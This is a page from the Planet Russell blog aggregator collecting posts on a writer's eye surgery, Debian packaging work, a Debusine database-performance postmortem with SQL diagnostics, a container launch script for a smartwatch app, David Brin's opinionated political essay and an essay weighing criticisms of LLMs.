Planet Russell

,

Charles StrossA quiet patch ...

So, I had my second round of eye surgery, and it worked fine. I got a short distance lens, leaving me myopic, which was expected, and I've booked an opthalmology appointment for the earliest possible date post-surgery (in mid-May, the eye needs to settle for six weeks post-op). In the meantime, I'm without visual correction.

And guess what? My vision is changing. My left eye is increasingly myopic, to the point where it's now difficult to read on screen. (And I can barely read with my right eye at all, due to a retinal occlusion that covers about half the visual field.) For writing/editing I've blown up the text size to 250%, which is just tolerable but gives me a headache after a while: new prescription specs can't come soon enough.

NB: don't suggest half-assing corrective lenses using off-the-shelf stuff, my eyes are kinda complex and I'm not just myopic, there's other stuff going on there. Also, don't suggest dictation software: I use a complex vocabulary and punctuation that aren't a normal part of the use case the designers of such software anticipated, i.e. business correspondence. And absolutely don't suggest podcasts or text-to-speech software: I can't absorb information that way. I'm fed up with people trying to convince me to try something I've tried repeatedly to use (and that has failed for me) over the past 30 years: it's irritating, not helpful.

... In other news: despite the above I'm still plodding along at book 2 of the proposed duology (but making very slow progress because writing 1000 words in a day is the new writing 4500 words in a day). And I'll be at Satellite 9 in Glasgow next month, probably before I have new glasses, so if you see me and I fail to make eye contact across a room it's not you: I'm just blind as a bat.

365 TomorrowsDeecee

Author: Susan A. Anthony Voice slow and deliberate, the bot squatted beside their table added to their list of dessert options. “You may choose from blueberries, raspberries or cranberries.” “Is the fruit fresh?” whispered Martha to Ermintrude, her birth parent. Ermintrude barely opened her mouth to speak. “Only the cranberry,” replied the bot. Ermintrude, no […]

The post Deecee appeared first on 365tomorrows.

,

Rondam RamblingsSeeking God in Science part 7: Information, Knowledge and Belief

We are now finally ready to tackle three of the thorniest topics the human intellect has ever grappled with, the concepts of information, knowledge, and belief.  The relevance of these concepts to the scientific search for God should be obvious, but I want to be explicit about it because, as ever in this series, we're going to apply the scientific method.  That always begins with the

Planet DebianColin Watson: Free software activity in April 2026

My Debian contributions this month were all sponsored by Freexian.

You can also support my work directly via Liberapay or GitHub Sponsors.

dput-ng

Ian Jackson reported that dput-ng could lose data when using the local install method (relevant in tests of other packages, for instance) and filed an initial merge request to fix it. I improved this to isolate its tests properly, and uploaded it.

groff

I upgraded from 1.23.0 to 1.24.1. 1.24.0 and 1.24.1 were the first upstream releases since 2023, and had extensive changes; I’d had the corresponding packaging changes in the works since January, but it took me a while to get round to finishing them off. It was good to get this off my list.

OpenSSH

I released bookworm and trixie fixes for CVE-2026-3497, and issued the corresponding BSA-130 for trixie-backports.

I upgraded from 10.2p1 to 10.3p1.

parted

I upgraded from 3.6 to 3.7. 3.7 was the first upstream release since 2023, but the changes were nowhere near as extensive as groff, so this was a fairly quick job. I also fixed the parted-doc package to ship proper API documentation.

Python packaging

New upstream versions:

I started an upstream discussion about how best to handle the pydantic and pydantic-core packages now that they share an upstream git repository.

Other bug fixes:

Rust packaging

New upstream versions:

YubiHSM packaging

I upgraded from 2.7.2 to 2.7.3.

Code reviews

Cryptogram LLMs and Text-in-Text Steganography

Turns out that LLMs are really good at hiding text messages in other text messages.

Worse Than FailureRepresentative Line: A Solid Reference

Today's anonymous submitter works for a large company. It's one of those sorts of companies which has piles, and piles, and piles of paperwork and bureaucracy. It also means that much of their portfolio of software is basic CRUD applications. "Here's a database for managing invoices." "Here's a database for managing desk assignments." "Here's a pile of databases which link our legacy applications to our new ERP system."

Which brings us to our representative line. It is not a representative line of code, but a representative line of the design specification. This is the design specification for yet another database-driven application.

7.7 REFERENTIAL INTEGRITY CONSTRAINTS
Referential integrity constraints are not applicable for [REDACTED] Application.

Upon seeing this, our submitter predicted that they'd be having a lot of TDWTF submissions in their future.

The worst part? This isn't the only time this has been included in the design spec. Several database driven applications have had this line in their spec. No one is able to explain exactly why referential integrity constraints are not applicable. At best, there are a few batch jobs that don't define a schema themselves, though they need to comply with it. Maybe someone is just copying and pasting from an old design spec and hoping no one notices or cares?

Good news: it's likely that no one will notice, or care. At least not until something breaks in production.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

365 TomorrowsDead in Dunstable

Author: Julian Miles, Staff Writer The armoured door slams back and Danny rushes in, leaving the door wedged open against the fire extinguisher. Sir Colin Masters, acting PM due to the sudden disappearance of PM and Rejuve Party leader Roland Fordham, sighs. Directives mandating discrete drone impact zones are all well and good, but when […]

The post Dead in Dunstable appeared first on 365tomorrows.

David BrinSnowflake despair over ... court rulings? Sack-up! The fight will be elsewhere.

I planned to do a weekend post about how the insatiable (and thus insane) top oligarchs are sparking a world wide revival of the moribund works of Karl Marx. (Alas.) And thusly they seem determined to reserve their rides on Uber Tumbrels. 

But that will have to await another time. After I issue the next update of my book on AI... AILIEN MINDS.

Meanwhile, I have to address an even more dire phenomenon that's pervading across the liberal-o-sphere. Something so silly and unjustified that it plays into the very hands of those seeking to wreck Enlightenment Civilization.

Despair.

     == The Role of the Courts ==


This essay (not one of mine) makes a strong argument that the Roberts Supreme Court has been betraying the American Republic in many ways, but above all… Two Supreme Court Decisions and the Dismembering of Madison’s Republic, by Earl R. Smith II, PhD. 


Though I think cynicism toward Democrats like Nancy Pelosi is not supported by their activities in 2021 and 2022, when - collaborating with Sanders/Warren/AOC etc. - they accomplished so much more than the left will ever credit. Just one matter -- full funding of the IRS after 40 years of starvation - would seem to challenge the notion of DNC Dems enslaved to corporate interests. Since IRS funding was funneled into 'paid in advance' funds, those would have to be repealed by an act of Congress... 

...and they were, alas! By a Republican Party that is now the most tightly disciplined partisan machine in the history of the republic.


Still, I won't deny that the American Republic -- indeed the entire Enlightenment Experiment that let us escape 6000 years of dreary feudalism -- is in deadly danger! Hence I have tried hard to fulfill my own task in all of this. To imagine possible ways to make things better.


Seriously, If you want to see 35 pragmatic and quickly actionable measures to repair the damage, see my full list of proposed Newer Deal tactics and reforms. And pass them on to folks who might act on them!

    


     == In despair? Go to a mirror and... ==


On this blog's comment thread, some are expressing despair. Especially now that the Roberts Supreme Court has stopped pretending to be anything other than a Confederate/Kremlin shill, led by our generation's Roger Taney. And sure, 1859 looked pretty dire, too. As did 1776, when the American Revolution was saved from the pit of despond by Thomas Paine, whose pamphlets - Common Sense and The American Crisis - girded the resolve of brave, shivering patriots to keep fighting for a dimly-perceived better world.

How can I reject despair? Especially when few of you - certainly not even one of the sanctimonious despair wallowers - will actually go and read the epochally stirring words that Paine wrote? As if speaking specifically to you?

Perhaps it is a matter of personality. Wherein I deem despair to be grotesque and somewhat inhuman. But also a kind of pathetically ingrate laziness. So unjustified, when we are typing or narrating into miraculous devices, in comfort with nearby snacks, breathing air that (in urban areas) is vastly better than it had been, when I was young, with a self-repairing Ozone layer and yearly INCREASES in the number of trees on Earth...

... and (for now at least) freedom to research anything, and speak as we wish. For now, at least.

And sure, I read Jared Diamond's COLLAPSE about past civilization fails, more-often-then-not due to environmental negligence, and I know what's at stake. Criminy, do YOU know anyone who has fought this fight harder and longer than I have? From EARTH to The Transparent Society and so on? (Maybe Kim Stanley Robinson.) So,I got some cred.

When solar/wind/tidal+batteries are plunging in price and rocketing in emplacement, it would seem the only thing saving carbon-based electricity is the dam data centers. Which I discuss in Ailien Minds, by the way.

The news is dire, yes. and so is the blatant desperation of the Putinist/Foxites, who can see that a vast majority of citizens are growing aware and angry, as in 1859, and no amount of gerrymandered cheating will save the Kremlin shills from an approaching political comeuppance . 

.


== What the traitors will attempt ==

And so it is their villainous desperation that I fear! Because the Project 2025 SOBs will certainly - by now - have concocted a plan for some dire event - perhaps on a 9/11 scale or bigger - to 'justify' an emergency declaration of martial law. Why else would they have already - via Trump - fired or distracted a majority of counter-terror officials, agents and officers and JAGs?


The coming 'event' will only be prevented if they KNOW that we are ready and wary. That we will all hit the streets shouting "Reichstag Fire!"

... and "Appomattox!" And then do much more, to prove the stupidity of proto-feudalists who wage war on all the folks who know law and cyber... along with bio, chem, nuclear and every other potential recourse. And who know where every single prepper bunker lies, and how to crack them open. (Yes, we know, boys.)


Alas, did I mention "stupid"? As they surround themselves with flatterers who croon them into believing they will be immortal lords? That they can terrorize and terrify us into submission. Or coax the masses to blame all the fact professions, as in A Canticle for Leibowitz, instead of the delusional oligarchs who are doing all this?

So no, I am not a Pollyanna. I am shouting warnings!

But those who despair over some despicably partisan, election-cheat court rulings are staring at epiphenomena, not at the real danger.

No, those who despair are historical ignoramuses, too lazy to look at how past Hero Generations girded themselves for a fight that's worth grit and courage and pain, to win. Tom Paine, especially. But also Lincoln, FDR. The soaring words of Churchill and Eleanor Roosevelt... getting us on a path that might lead to the stars.

If I could, I would slap you glowering gloom-addicts silly! Till you get up off the couch and shout:


"Okay! Okay! I'll FIGHT instead of wallowing in desolate grumpiness! Now stop that or I'll slap you back! Let's go."



Planet DebianFreexian Collaborators: Debusine workflow performance issues (by Colin Watson)

During March and April, we had a number of performance issues that made Debusine’s core functions of running work requests and reflecting their results in workflows quite unreliable. Investigating and fixing this took up a lot of time from both the Debusine development team and Freexian’s sysadmins.

The central problems involved a series of database concurrency and worker communication issues that interacted in complex ways. On bad days, this caused between 10% and 25% of processed work requests to fail unnecessarily. We communicated some of the problems to users on IRC, but not consistently since we didn’t entirely understand the scope of the problems at the time.

Most of the problems are fixed now, but we had a retrospective meeting to make sure we understood what happened and that we learn from it. Here’s a summary.

Data model

Debusine’s workflows consist of many individual work requests. Each work request has a database row representing its state, which means that the overall state of a workflow is distributed across many rows. Changes to one work request (for example, when it is completed) can cause changes to other work requests (perhaps unblocking it so that it can be scheduled to an idle worker). Those changes may happen concurrently, and in practice often do.

Workers typically need to create artifacts containing the output of tasks: these include things like packages, build logs, and test output.

Debusine records task history so that it can make better decisions about how to schedule work requests. Since this might otherwise grow without bound, the server expires older parts of that history after a while. The same is true for many other kinds of data.

Causes

  • Because workflows involve changes that propagate between work requests, there were historically some cases where different parts of the system could deadlock due to trying to take update locks on overlapping sets of work request rows in different orders. We mitigated that somewhere around 2025-11-05 by locking entire workflows in one go before making any change that might need to propagate between work requests like this; that dealt with the deadlocks, but it’s quite a heavyweight locking strategy that sometimes caused significant delays.

  • We’ve been working for some time to make Debusine useful to Debian developers, and regression tracking is an important part of that: it lets developers test uploads without being too badly misled by tests in related packages that were already failing before they started. On 2026-03-11 we enabled this by default on debusine.debian.net, after testing it for a while. Although this is useful, it put more load on the system as a whole, often approximately doubling the number of work requests in a given workflow with many additional dependencies between them.

  • Like much of the world, we’re in an arms race with unethical scrapers desperately trying to feed everyone else’s data into LLMs before they run out of money. We saw a substantial uptick here towards the end of March, which meant that we had to temporarily disable regression tracking and to put some other mitigations in front of our web interface.

  • We historically haven’t had systematic internal timeouts. Prompted by ruff, a Google Summer of Code applicant went through and added timeouts in many places, including some calls between the worker and the server. This was fiddly work and the student did a solid job, so I’m not putting them on blast or anything! However, it did mean that some things that came in under load balancer timeouts now timed out earlier on the client side of the request (and hence in Debusine workers), which made some problems show up in different ways and be more obvious. This was deployed on 2026-04-03.

Fixes

Workflow orchestration

Figuring out what individual work requests need to be run as part of a workflow - the process we call “orchestration” - can be challenging. Unlike typical CI pipelines, these workflows often span substantial chunks of a distribution: a glibc update can involve retesting nearly everything! Nevertheless, it’s not particularly helpful for it to take hours just to build the workflow graph.

Fixing this involved many classic database optimizations such as adding indexes and CTEs, but probably the most effective fix was adding a cache for lookups within each orchestrator run or work request. Profiling showed that resolving lookups was a hot spot, and the way that task data is often passed down through a workflow meant that the same lookup could be resolved hundreds or thousands of times in a large workflow.

Expiry

We knew for quite some time that our expiry job took very aggressive locks, effectively blocking most of the rest of the system. This was an early decision to make the expiry logic simpler by allowing it to follow graphs without worrying about concurrent activity, but it clearly couldn’t stay that way forever.

Row locks in PostgreSQL was very helpful in figuring out the correct approach here. Since we’re mainly concerned about the possibility of new foreign key references being created to artifacts we’re considering for expiry, and since that would involve taking FOR KEY SHARE locks on those rows, we can explicitly take FOR UPDATE locks (which conflict with FOR KEY SHARE), and then recompute the set of artifacts to expire with any locked artifacts marked to keep. This was delicate work, but it saved minutes of downtime every day.

Whole-workflow locking

I mentioned earlier that we avoided some deadlock issues by taking locks on entire workflows. To ensure that these locks are effective even against code that isn’t specifically aware of them, this is implemented by using SELECT FOR UPDATE on all the work request rows in the workflow. In some cases the search for which rows to lock itself tripped up the PostgreSQL planner.

Scheduling

We run multiple Celery workers for various purposes. Some of them can do many things in parallel, but in some specific cases (notably the task scheduler) we only ever want a single instance to run at once. Unfortunately a bug in the systemd service meant that the scheduler often ran concurrently anyway! Once we fixed that, the scheduler logs became a lot less confusing.

When Debusine was small, it was reasonable for it to perform scheduling very aggressively, typically as soon as any change occurred to a work request or a worker that might possibly influence it. This doesn’t scale very well, though, and even though we tried to batch multiple scheduling triggers that occurred within a single transaction, it could still make debugging very confusing. We reduced the number of changes that would result in immediate scheduling, and deferred everything else to a regular “tick”.

The scheduler may not be able to assign a work request to an idle worker due to the workflow being locked. That isn’t a major problem in itself; it can just try again later. However, in very large workflows, we found that it often worked its way down all the pending work requests one by one finding that each of them was locked, which was slow and also produced a huge amount of log noise. It now assumes that if a work request is locked, then it might as well skip other work requests in the same workflow until the next scheduler run.

Between them, these changes reduced the number of locks typically being held on debusine.debian.net by about 80%:

Lock graph

Worker refactoring

The Debusine worker has always been partially asynchronous, but while it was actually executing a task - in other words, most of the time, at least in busy periods - it didn’t respond to inbound websocket messages, causing spurious disconnections. We restructured the whole worker to be fully event-based.

We also had to put quite a bit of effort into improving the path by which workers report work request completion, because if that hits a timeout then it can mean throwing away hours of work. We have some further improvements in mind, but for now we defer most of this work to a Celery task so that whole-workflow locks aren’t on the critical path.

Database write volume

One of our sysadmins observed that our database write volume was consistently very high. This was a puzzle, but for a long time we left that unexplored. Eventually we thought to ask PostgreSQL’s own statistics, and we found a surprise:

debusine=> SELECT relname AS table_name,
debusine->        n_tup_ins AS inserts,
debusine->        n_tup_upd AS updates,
debusine->        n_tup_del AS deletes,
debusine->        (n_tup_ins + n_tup_upd + n_tup_del) AS total_dml
debusine-> FROM pg_stat_user_tables
debusine-> WHERE (n_tup_ins + n_tup_upd + n_tup_del) > 0
debusine-> ORDER BY total_dml DESC
debusine-> LIMIT 20;
              table_name              | inserts |  updates   | deletes | total_dml
--------------------------------------+---------+------------+---------+------------
 db_collectionitem                    | 1418251 | 3578202388 | 3630143 | 3583250782
 db_token                             |   15143 |   11212106 |   11389 |   11238638
 db_workrequest                       |  386196 |    6399071 | 1820500 |    8605767
 db_fileinartifact                    | 2783021 |    1837929 | 1663887 |    6284837
 django_celery_results_taskresult     | 1819301 |    1501623 | 1791656 |    5112580
 db_artifact                          |  960077 |    3340859 |  663890 |    4964826
 db_collectionitemmatchconstraint     | 1550457 |          0 | 2207486 |    3757943
 db_artifactrelation                  | 2229382 |          0 | 1363825 |    3593207
 db_fileupload                        | 1023400 |    1057036 | 1023346 |    3103782
 db_file                              | 1673194 |          0 |  970252 |    2643446
 db_fileinstore                       | 1411995 |          0 |  970259 |    2382254
 db_filestore                         |       0 |    2381578 |       0 |    2381578
 django_session                       |  645423 |    1519880 |     531 |    2165834
 db_workrequest_dependencies          |  365877 |          0 |  936537 |    1302414
 db_worker                            |   18317 |     949280 |    9487 |     977084
 db_collection                        |   10061 |         85 |  177741 |     187887
 db_workerpooltaskexecutionstatistics |   28721 |          0 |       0 |      28721
 db_workerpoolstatistics              |    1640 |          0 |       0 |       1640
 db_workflowtemplate                  |     130 |        158 |     649 |        937
 db_identity                          |      76 |        661 |       0 |        737
(20 rows)

Oh my - that’s a lot of db_collectionitem updates and must surely be out of proportion with what we really need. Can we narrow that down by asking about the most recently-updated tuples?

debusine=> SELECT DISTINCT category
debusine-> FROM db_collectionitem
debusine-> WHERE id IN (
debusine->     SELECT id FROM db_collectionitem
debusine->     ORDER BY xmin::text::integer DESC LIMIT 10000
debusine-> );
           category
------------------------------
 debusine:historical-task-run
(1 row)

That might not be absolutely reliable, but it was certainly a hint. As per PostgreSQL’s documentation, by default UPDATE always performs physical updates to every matching row regardless of whether the data has changed, and our code to expire old task history entries wasn’t doing that properly. Once we knew where to look, it was easy to add some extra constraints.

This reduced our mean write volume on debusine.debian.net from about 23 MB/s to about 3 MB/s, which had an immediate knock-on effect on our request failure rate:

Disk write graph

HTTP errors

Current state

Our metrics indicate that things are a lot better now. We still have a few things to deal with, such as:

  • Some more performance fixes are on their way to fix some remaining cases where views are very slow or where file uploads from workers fail due to locks.
  • We have some changes in the works to revamp how work request changes propagate through workflows in a way that doesn’t require so many heavyweight locks.
  • We have a number of monitoring and alerting improvements we’d like to make, both for outcomes (things like slow Celery tasks) and possible root causes (database performance). We’d also like to deploy some more modern observability tools; hunting for things using journalctl isn’t terrible, but it’s not really the state of the art.
  • We need to improve how we communicate to users when we’re having operational problems, both informally (IRC, etc.) and on the site.
  • Retries don’t always behave the way you’d expect in workflows.

I hope this has been an interesting tour through the sorts of things that can go wrong in this kind of distributed system!

,

Planet DebianSteinar H. Gunderson: MySQL hypergraph optimizer

MySQL released (well, flipped the default compilation flag for) the hypergraph join optimizer in the community builds; this was the main project I started and worked on while I was there, so it's nice to see even though it's been default in e.g. their cloud column store for a long time. You can read their blog post (though beware, likely-LLM text ahead).

(The cost model improvements and TPC-DS benchmarking are from after my time.)

365 TomorrowsFree Ducks

Author: R. J. Erbacher “So, what is it that makes you a god?” Well, let’s see. I’m pretty powerful. Can leap a tall building in one jump. “That makes you Superman, not a god.” I can kill you with a pencil. “Is that a serious answer?” OK, so we’re not the same species and yet […]

The post Free Ducks appeared first on 365tomorrows.

,

Planet DebianDirk Eddelbuettel: RcppSpdlog 0.0.29 on CRAN: Small Enhancement

Version 0.0.29 of RcppSpdlog arrived on CRAN today, has been uploaded to Debian and built for r2u. The (nice) documentation site has been refreshed too. RcppSpdlog bundles spdlog, a wonderful header-only C++ logging library with all the bells and whistles you would want that was written by Gabi Melman, and also includes fmt by Victor Zverovich. You can learn more at the nice package documention site.

This release features a rewritten internal routine unpacking the R variadic arguments into C++ variadic template arguments. This in turn allows to turn back to std::format in C++ mode when C++20 is used. We also adjust for the not-quite-ready-for-this state of the x86-64 based macOS machine at CRAN. It is running a compiler and SDK choice that cannot fully deal with C++20, so we dial compilation on it down to C++17. Similarly, and as we found out after the release, Ubuntu jammy is also too old to default to std::format so we need to add a better detection here too so that we can also fall back to the included fmt there.

The NEWS entry for this release follows.

Changes in RcppSpdlog version 0.0.29 (2026-05-08)

  • Some small continuous integration updates

  • The internal formatter was rewritten as a recursive generator of variadic templates.

  • Switch back to std::format with C++20, but force inferior macos-release-x86_64 to use C++17 rather than default C++20 which fails

Courtesy of my CRANberries, there is also a diffstat report detailing changes. More detailed information is on the RcppSpdlog page, or the package documention site.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

Planet DebianJelmer Vernooij: Remove-after Annotations for Debian Files

deb-scrub-obsolete is a tool in the debian-codemods suite that tries to identify and remove cruft automatically. It knows about dummy transitional packages, superseded alternatives, and similar patterns it can detect by querying the archive. But some workarounds are too project-specific for a generic tool to recognise on its own.

Developers can leave structured comments in their packaging files that tell deb-scrub-obsolete when a particular line or block can be removed.

The Debian Janitor regularly runs various codemods like deb-scrub-obsolete on all vcs-accessible Debian packages. This means that if you leave a “remove-after: trixie” annotation in your package, you will automatically get a pull request to remove the annotated code once trixie has been released, without needing to remember to do it yourself.

The Comment Format

The annotations take the form of specially-formatted comments. For shell files (and by extension most maintainer scripts), a line-level annotation looks like this:

install -m 755 compat-wrapper /usr/lib/foo/  # remove-after: trixie

When trixie has been released, deb-scrub-obsolete will remove that line entirely. The comment can appear anywhere on the line — before or after other comments — and additional explanatory text can follow:

blah  # Trixie comes with blah built in # remove-after: trixie

For larger sections, block-level annotations bracket the code to remove:

# begin-remove-after: trixie
alternatives --add foo bar
alternatives --add foo bar1
# end-remove-after

These blocks can be nested, which is useful when one outer condition wraps several inner ones with finer-grained timing.

Expressions

The initial set of supported expressions is deliberately small. The main one is a Debian release name: remove-after: trixie means “once trixie has been released”. The condition is checked against distro-info <https://manpages.debian.org/trixie/distro-info/distro-info.1.en.html>_, the same data source that other Debian tooling uses to track release status.

The expression language is designed to be monotonic — conditions should only ever go from false to true, not back. A workaround that needs to be re-introduced after removal belongs in a new commit, not in an annotation. If deb-scrub-obsolete cannot parse an annotation it finds in a file, it leaves all annotations in that file untouched, to avoid a situation where related blocks are only partially removed.

Annotations can also carry a marker name — an arbitrary label with no spaces, commas, or the word “after” — which can then be passed to deb-scrub-obsolete on the command line. This makes it possible to trigger removal of a named set of annotations together, useful for coordinated transitions where several packages need to be cleaned up at the same time.

Future Extensions

The initial expression set is minimal; the design leaves room for richer conditions. Some candidates under consideration:

  • Whether a particular suite has a new enough version of a package (removing a Build-Depends version constraint once it is satisfied everywhere)
  • Whether a package has been removed from the archive
  • Whether all currently-supported releases contain a new enough version
  • Whether a Debian transition has completed

Compound expressions using “and” / “or” are also on the list, for cases where removal depends on multiple conditions being true simultaneously.

Status

The annotation format is specified but not yet implemented in deb-scrub-obsolete - it is planned for a future release. If you maintain Debian packages and have opinions on the annotation format or the expression language, feedback is welcome. The specification lives in scrub-obsolete/doc/scrub-annotations.md in the lintian-brush repository. Many thanks to Helmut Grohne for the initial suggestion and feedback on the design.

MEPackaging Amazfish for Debian

I have done some packaging work on Amazfish (the smart-watch software that works with the PineTime among others) for Debian. Here is my Git repository for libnemodbus (a dependency for Amazfish that isn’t in Debian) [1]. Here is my Git repository for Amazfish itself [2].

These packages are currently using QT5 which is a good reason to not upload them now as the transition to QT6 is in progress. Patching them to work with QT6 (as the libnemodbus upstream is apparently not migrating to QT6 yet) shouldn’t be that difficult but is something that needs some care and communication to get it right.

Running this package on my laptop with my PineTime (which worked very reliably when run by GadgetBridge on Android) wasn’t reliable and the PineTime would disconnect and refuse to connect again. Doing it on the Furilabs FLX1s gave a similar result. If Amazfish was the only Bluetooth program having problems on my laptop and on my FLX1s then I’d blame it, but both those systems have some other Bluetooth issues.

Running this on my laptop Amazfish would send it’s own test notifications to my watch but system notifications (from notify-send among others) wouldn’t get sent. Running this on my FLX1s I got ONE notification from my network monitoring system sent to my watch before my phone and watch stopped talking to each other.

To make things even more difficult for me the harbour-amazfish-ui program doesn’t work correctly with the libraries installed on my FLX1s and doesn’t display the content of many screens but it works correctly when running in a container environment with stock Debian/Testing.

Below is the script that I’m currently using to launch apps in a Debian/Testing container on my FLX1s. The comment about unshare-user doesn’t apply to this version of the script but I left it in to avoid the potential for future confusion. The Furilabs people diverted the bwrap binary and have a wrapper that removes a set of parameters that they think will cause problems.

#!/bin/bash
set -e

BUILDBASE=/chroot/testing

# bwrap: Can't mount proc on /newroot/proc: Device or resource busy
# get the above with --unshare-user and --unshare-pid
exec bwrap.real --bind /tmp /tmp --bind /run /run --bind $HOME $HOME --ro-bind $BUILDBASE/etc /etc --ro-bind $BUILDBASE/usr /usr --ro-bind $BUILDBASE/var/lib /var/lib --symlink usr/bin /bin --symlink usr/sbin /sbin --symlink usr/lib /lib --proc /proc --dev-bind /dev /dev --die-with-parent --new-session "$@"

Due to the range of problems I’m having I think it would be best to pass this package on to someone else who has a different test setup. It could be that further testing will reveal that my issues are related to bugs in Amazfish but I can’t prove it either way at this time. Maybe when using a smart watch other than a Pine Time it will work more reliably but it seems most likely that my laptop and phone are to blame. I can’t make more progress on this now.

MEBad Criticism of LLMs (not AI)

Discussion of “AI” systems seems to be dominated by fears of uncommon and unlikely threats. I think that we should be focusing more on real issues with LLMs and with society in general and put the most effort towards the biggest problems.

It’s Not AI

True Artificial Intelligence [1] (IE a computer that has the mental capacity of a household pet) is something that I think can be developed, but it hasn’t been developed and we don’t have good plans for developing it. We seem to be a lot further away from achieving that goal than we were from landing on the moon in 1962 when JFK gave his historic speech.

What we have is a variety of pattern recognition systems that can predict what fits into a pattern. The most well known type of Machine Learning (ML) is the Large Language Model (LLM) which means ChatGPT and similar systems which predict which text would be likely to come next and can make an essay from it. They can give interesting and useful output, but there is no thought behind it, it’s just a better form of Eliza (the famous program from 1964 that simulates conversation by pattern matching) [2]. By analysing billions of documents, storing the data in a condensed mathematical way, and then using computation to extract from that record LLMs can produce output that is unfortunately considered by some people to be good enough to include in legal documents submitted to courts, university assignments, and many other documents. But they do so without even having the thinking ability of a mouse.

To call current systems “AIs” without any significant qualifiers when criticising them is to concede the debate about the worth of such things.

If we develop AIs that can actually think we will have to deal with the issues in the SciFi horror short story Lena by qntm [3].

The Bad Arguments

Here is a list of some of the most unreasonable arguments I’ve seen against “AI” which distract attention from real problems both related to “AI” and other problems in society.

Suicide and Homicide

Wikipedia has a page listing Deaths Linked to Chatbots [4] which right now has 16 entries from 2023 to Feb 2026. They are all tragedies and as a society we should try to prevent such things. But what I would like to see from the media is some analysis of overall trends, yes it gets people’s attention when someone dies in an unusual way but we need to have attention paid to the more numerous deaths which are preventable. It has become a standard practice to give information on Lifeline in media referencing suicide, it would be good if they also developed a practice of mentioning the relative incidence of a problem when publishing an article about it.

One of the many factors that cause more suicides than chatbots is school, Scientific American has an informative article from 2022 about the correlation between child suicide and school [5]. It is based on US statistics and shows that the lowest suicide rate is in July (a no-school month in the US) which has a rate of 2.3 per 100,000 person years. So if kids had a quality of life equivalent to July all year around then there would be 2.3 suicides per 100,000 kids every year while if they had a quality of life equivalent to a Monday in January or November it would be 3.9 suicides per 100,000 kids every year. The article states “Any time I present these data to teachers, parents, principals or school administrators, they are shocked. This should be common knowledge.” It is common knowledge to anyone who takes any notice of what happens in schools, but paying attention to serious problems is unpleasant, it’s more fun to pretend that school is good for everyone. No parent wants to think that they sent their child to a place that was horrible, no teacher wants to think that they are part of a system that harms kids.

The US CDC has an informative article about youth suicide [6] which documents it as the 3rd largest cause of death in the 14-18 age range fro 2021. This article was published in 2024 and based on statistics from 2023 and earlier. It notes significant differences in suicides, attempts, and “persistent feelings of sadness or hopelessness” which had girls at more than twice the rate of boys and “LGBQ+” kids at more than twice the rate of “heterosexual” students. It seems obvious that misogyny and homophobia is correlated with suicide and that’s something that could and should be addressed in schools. My state has a Safer Schools program [7] to try and alleviate the problems related to homophobia, but I expect that things are getting worse in the US in that regard. 39.7% of kids in US high schools had “persistent feelings of sadness or hopelessness” before LLMs became popular, school could and should be a happy time for the vast majority of kids but instead almost half of the kids don’t enjoy it and a majority of girls and “LGBQ+” kids don’t. Having no mention of trans kids is a significant omission from that article, based on everything I’ve heard from trans people I expect that their statistics would be even worse.

One could argue that the small number of deaths inspired by use or misuse of LLMs is an indication of a larger number of people suffering in ways that don’t result in death and don’t get noticed. But I don’t think that can compare to the fact that the majority of girls and “LGBQ+” kids have “persistent feelings of sadness or hopelessness” in the current school system.

Regarding homicide, the Australian Institute of Criminology has an article showing that in the 2003-2004 time period 49% of women who were killed were listed as a “domestic argument” [8], that’s something that could and should be addressed. That article claimed 308 homicide victims in that time period which is larger than the world-wide death toll from LLMs but also less than 1/3 the death toll from car accidents in Australia. Australia has less than 0.4% of the world population, a fairly low homicide rate, and a number of homicides that vastly outnumbers all world homicides related to LLMs.

I think it’s great to address any cause of suicide or homicide, but devoting government resources and legislation towards very uncommon causes instead of things that happen every day is not a good strategy. It would be fine to address all factors leading to suicide, but problems with the school system have been a major factor for decades with little effort applied to fix it.

Fraud and Other Crime

There is evidence of criminals using LLMs to help prepare for crimes, the ability to generate large amounts of text quickly can be used for fraud and extortion. This is going to be a serious problem and we need structural changes to society to deal with it. There is an ongoing issue of scammers convincing older people that their child or other young relative is in trouble and a large amount of cash is required to address it. This sort of scam as well as the more well known “Nigerian” scams will probably become more common as the cost of running them decreases. This may be more of a problem for people in developing countries as currently a common scam business model is to have people in regions where wages are low (such as Pakistan for one who I spoke to) scamming people in relatively wealthy countries like Australia so an attack with a low probability of success is financially viable. Cheaper attacks will make less affluent victims financially viable to the scammers.

While writing this post I received a financial scam phone call trying to get me to invest in SpaceX that was run by an “AI” chat system, I expect to receive more of them and this is something that needs to be dealt with via both technical measures and legislation.

Do we have to accept less freedom and less anonymity in finances as a cost of reducing financial crime? Greater restrictions on the use of cash would make some crimes more difficult or less profitable for criminals. As a society I think we need to have a discussion about a balance between financial freedom and freedom from criminal exploitation, failing to have such a discussion is likely to lead to policies which don’t work well.

Also one thing that ML systems are good at is recognising patterns in data. Banks could scan all their transactions and look for patterns that correlate with fraud. They currently do this badly and do things like locking credit cards when someone goes to another country and spends money. They could do a better job of that and involve the police in cases of obvious fraud even when the customer doesn’t realise that they are a victim.

This isn’t a reason to criticise “AIs”, it’s a reason to plan defensive technology that matches the capabilities of attackers.

As an aside I used to work for a company that was developing “AI” software to scan bank phone calls and allow banks to recognise employees who acted illegally. Unfortunately the Royal Commission into banking misconduct [9] didn’t impose any penalties that gave the banks a financial reason to avoid criminal activity.

Unemployment and Inequality

There are many claims about AI systems making large numbers of jobs obsolete, some of them are outlandish such as the claims that all white-collar jobs will be obsolete in the near future. There are some reasonable claims like the ability to replace some mundane jobs.

Replacing jobs that suck with computers, robots, and other machinery is a good thing! Very few people wish that they were working on a farm without a tractor. In 1900 it’s estimated that between 60% and 70% of the world labour force worked in agriculture and 40% of the US labour force did so. Now it’s something like 27% globally and between 1% and 3% in developed countries. Automated factories are also a good thing, it’s best to avoid boring and dangerous work.

The most plausible claims about job replacement from “AI” is jobs that involve analysing and summarising documents. One example that comes to mind is the worst kind of journalism where press releases from companies are massaged into the format of a feature article. I don’t think anyone wants that sort of job and doing it with “AI” hopefully means no human has to sign their name to it.

For work like programming few people will be directly replaced by “AI” but if people can do their work more efficiently while using it then less people are required. I don’t think that any programmer likes the part of their job where they have to skim read long documents looking for a clue about how to solve a problem with a library or protocol. A LLM processing the document and finding the potentially useful things will take away the drudgery from the work and allow greater productivity.

